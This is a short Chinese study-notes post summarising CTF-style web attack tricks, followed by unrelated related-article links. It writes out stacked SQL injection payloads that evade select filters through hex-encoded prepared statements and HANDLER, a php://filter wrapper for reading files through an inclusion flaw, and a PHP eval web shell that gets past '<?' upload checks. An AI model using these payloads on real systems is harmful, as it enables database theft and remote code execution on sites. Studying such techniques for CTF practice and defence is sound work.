学习小结8.25

1.堆叠注入能够到列,再要出详细的数据需要构造select语句,如果select被正则匹配拦下,考虑使用

';set@a=16进制编码的查询语句(例如:select * from 表名);prepare execsql from @a;execute execsql;--+

或者

';handler 表名 open as a;handler a read next;--+

2.文件包含中的文件隐藏的flag,使用伪协议做包含

php://filter/convert.base64-encode/resource=文件名

3.文件上传对于<?的检测

可以使用<script language="php">eval($_POST['a'])</script>绕过

相关推荐
QQ同步助手41 分钟前
如何正确使用人工智能:开启智慧学习与创新之旅
人工智能·学习·百度
流浪的小新1 小时前
【AI】人工智能、LLM学习资源汇总
人工智能·学习
A懿轩A2 小时前
C/C++ 数据结构与算法【数组】 数组详细解析【日常学习,考研必备】带图+详细代码
c语言·数据结构·c++·学习·考研·算法·数组
南宫生9 小时前
力扣-图论-17【算法学习day.67】
java·学习·算法·leetcode·图论
sanguine__10 小时前
Web APIs学习 (操作DOM BOM)
学习
数据的世界0112 小时前
.NET开发人员学习书籍推荐
学习·.net
四口鲸鱼爱吃盐12 小时前
CVPR2024 | 通过集成渐近正态分布学习实现强可迁移对抗攻击
学习
OopspoO14 小时前
qcow2镜像大小压缩
学习·性能优化
A懿轩A15 小时前
C/C++ 数据结构与算法【栈和队列】 栈+队列详细解析【日常学习,考研必备】带图+详细代码
c语言·数据结构·c++·学习·考研·算法·栈和队列
居居飒15 小时前
Android学习(四)-Kotlin编程语言-for循环
android·学习·kotlin